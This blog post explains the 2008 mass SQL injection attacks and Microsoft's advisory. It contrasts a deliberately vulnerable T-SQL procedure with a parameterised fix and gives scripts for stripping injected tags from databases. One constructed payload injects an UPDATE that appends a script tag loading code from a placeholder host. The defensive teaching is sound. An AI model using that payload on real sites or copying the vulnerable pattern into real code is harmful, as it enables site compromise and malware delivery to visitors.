Microsoft issues advice on SQL injection attacks
Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.
This includes the uc8010 attack, which was launched around 28 December 2007 (see here and here for the lowdown on uc8010).
For the record, the attack exploits poor programming (or lazy programming at any rate) in the web application itself, not a flaw in SQL Server or IIS, and Microsoft are keen to point out that:
Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.
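To make the "poor programming" concrete, here is an added example in T-SQL (my code, not anything from the advisory, Microsoft or the original post). It shows the pattern the mass attacks exploited, a value from the client concatenated into a SQL string and executed, next to the standard fix, a parameterised statement. The table, procedure names and the payload are assumptions made for illustration.

```sql
-- Added example (mine, not code from the advisory or the original post):
-- the coding mistake behind these mass attacks and its fix, in T-SQL.
-- Table name, procedure names and the payload are assumptions for illustration.
CREATE TABLE dbo.Products (ProductId int PRIMARY KEY, Name varchar(100));
INSERT INTO dbo.Products (ProductId, Name) VALUES (1, 'Widget');
GO

-- VULNERABLE: the caller's value is pasted into the statement text and the
-- text is executed. Anything after a semicolon in @ProductId runs as a second
-- statement, which is how the mass attacks got their UPDATE into the database.
CREATE PROCEDURE dbo.GetProduct_Vulnerable @ProductId varchar(200)
AS
    EXEC('SELECT Name FROM dbo.Products WHERE ProductId = ' + @ProductId);
GO

-- FIXED: the value travels as a typed parameter of sp_executesql. The statement
-- text is a constant, so the input can only ever be compared with ProductId.
CREATE PROCEDURE dbo.GetProduct_Safe @ProductId int
AS
    EXEC sp_executesql
        N'SELECT Name FROM dbo.Products WHERE ProductId = @id',
        N'@id int',
        @id = @ProductId;
GO

-- Constructed payload: a valid-looking id followed by an injected statement
-- that appends a script tag to a text column (http://example.invalid is a
-- placeholder, not a real attack host).
EXEC dbo.GetProduct_Vulnerable
    '1; UPDATE dbo.Products SET Name = Name + ''<script src=http://example.invalid/x.js></script>''';
SELECT Name FROM dbo.Products;   -- Name now carries the appended script tag

-- The same payload against the safe procedure never reaches SQL at all: the
-- string cannot be converted to int, so the call fails with a conversion error
-- before anything executes.
EXEC dbo.GetProduct_Safe '1; UPDATE dbo.Products SET Name = ''x''';
```

In the classic ASP sites these attacks hit, the equivalent of the vulnerable procedure is a SQL string built from Request.QueryString and handed to ADO; the equivalent fix is an ADO Command with Parameters (or a stored procedure call with typed parameters) so the query text never contains user data. Note that the real payloads were usually hex-encoded and unpacked with CAST(... AS varchar) before EXEC, so filtering the input for words like UPDATE or for quote characters is not a fix; only keeping data out of the statement text is.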
For those of you who have been recently hit by an SQL injection attack, here are some useful resources that I have found:
- SQL Injection Attacks by Example
- Microsoft Security Advisory (954462)
- Mass attack FAQ from hackademix.net (VERY handy if you do not have a clean backed-up version of your database)
- U.N.Patched (the story of how the UN got their site attacked)
What to do if you do not have a backed-up copy of your database from before the SQL injection attack
hackademix.net has code which *may* reverse the SQL injection attack
This is the crucial piece of code which could save your bacon:
-- @T and @C hold the table and column being processed; in the full
-- hackademix.net script they are supplied by a cursor that walks every
-- text column in the database. convert(varchar(8000), ...) is there
-- because len() will not accept text/ntext, but it also truncates any
-- value longer than 8000 characters. The update keeps everything before
-- the LAST "<script" (found via reverse() and patindex(); the 6 is
-- len("script"), so the "<" is dropped as well) and only touches rows
-- whose value ENDS with the injected tag.
EXEC(
'
update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+']))))
where ['+@C+'] like ''%<script%</script>''
'
);
More than likely you will have to modify it for your specific attack (a different payload, tags that were not appended at the very end of the value, or text columns longer than 8000 characters), so take a backup of the damaged database first and check hackademix.net for the full script and details.
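The fragment above only makes sense inside a loop over the database's text columns, and it is worth knowing what it is going to change before it changes anything. As an added example (my code, not the hackademix.net script and not from the original post), here is the general procedure around it: step 1 inventories every table and column that ends with a script tag, with a hit count and the tag that would be removed, so you can spot legitimate content that merely happens to end in a script tag; step 2 then applies the same left()/reverse()/patindex() cleanup to each column listed. It assumes SQL Server 2000 or later (the INFORMATION_SCHEMA views exist) and that the tag was appended to the end of each value, which is the shape these mass attacks produced; the temp table and cursor names are my own.

```sql
-- Added example (mine, not the hackademix.net script or anything from the
-- original post). Assumes SQL Server 2000 or later (INFORMATION_SCHEMA views
-- exist) and that the injected tag was appended to the END of each value,
-- the shape these mass attacks produced. Take a full backup before step 2.
SET NOCOUNT ON;
DECLARE @T nvarchar(300), @C sysname, @sql nvarchar(4000);

-- Step 1: inventory. One row per affected table/column with a hit count and
-- the tag that would be removed, so you can review it before changing data.
CREATE TABLE #hits (TableName nvarchar(300), ColumnName sysname,
                    Hits int, SampleTag varchar(8000));

DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT QUOTENAME(c.TABLE_SCHEMA) + '.' + QUOTENAME(c.TABLE_NAME), c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char','varchar','text','nchar','nvarchar','ntext');
OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @T, @C;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- reverse()+patindex() locates the last "<script"; right(v, pos + 6)
    -- is the tag itself (6 = len("script")), the same arithmetic as the
    -- cleanup statement, just used to show the tag instead of cutting it.
    SET @sql = N'INSERT INTO #hits SELECT N''' + REPLACE(@T, '''', '''''') + ''', N'''
             + REPLACE(@C, '''', '''''') + ''', COUNT(*), '
             + 'MAX(right(convert(varchar(8000), ' + QUOTENAME(@C) + '), '
             + 'patindex(''%tpircs<%'', reverse(convert(varchar(8000), ' + QUOTENAME(@C) + '))) + 6)) '
             + 'FROM ' + @T + ' WHERE ' + QUOTENAME(@C) + ' LIKE ''%<script%</script>'' '
             + 'HAVING COUNT(*) > 0';
    EXEC(@sql);
    FETCH NEXT FROM col_cursor INTO @T, @C;
END
CLOSE col_cursor; DEALLOCATE col_cursor;

SELECT * FROM #hits ORDER BY Hits DESC;   -- review this before going on

-- Step 2: strip the trailing tag from every column listed in #hits, using
-- the same left()/reverse()/patindex() expression as the cleanup snippet.
-- Delete any legitimate hits (pages that genuinely end with a script tag)
-- from #hits first.
DECLARE fix_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT TableName, ColumnName FROM #hits;
OPEN fix_cursor;
FETCH NEXT FROM fix_cursor INTO @T, @C;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'UPDATE ' + @T + ' SET ' + QUOTENAME(@C) + ' = left('
             + 'convert(varchar(8000), ' + QUOTENAME(@C) + '), '
             + 'len(convert(varchar(8000), ' + QUOTENAME(@C) + ')) - 6 - '
             + 'patindex(''%tpircs<%'', reverse(convert(varchar(8000), ' + QUOTENAME(@C) + ')))) '
             + 'WHERE ' + QUOTENAME(@C) + ' LIKE ''%<script%</script>''';
    EXEC(@sql);
    PRINT 'cleaned ' + CAST(@@ROWCOUNT AS varchar(10)) + ' rows in ' + @T + '.' + QUOTENAME(@C);
    FETCH NEXT FROM fix_cursor INTO @T, @C;
END
CLOSE fix_cursor; DEALLOCATE fix_cursor;
DROP TABLE #hits;
```

Run step 1 on its own first and look at SampleTag: every row should show the same injected tag, and a column whose sample is something else (or whose Hits is suspiciously high for, say, a CMS page body) should be removed from #hits before step 2. The 8000-character truncation that comes with convert(varchar(8000), ...) applies here exactly as it does to the original snippet; on SQL Server 2005 and later you can substitute varchar(max) throughout to avoid it. If the attack you were hit by did not append the tag at the end of the value, the LIKE pattern and the left()/patindex() arithmetic both need changing, which is why the inventory step comes first.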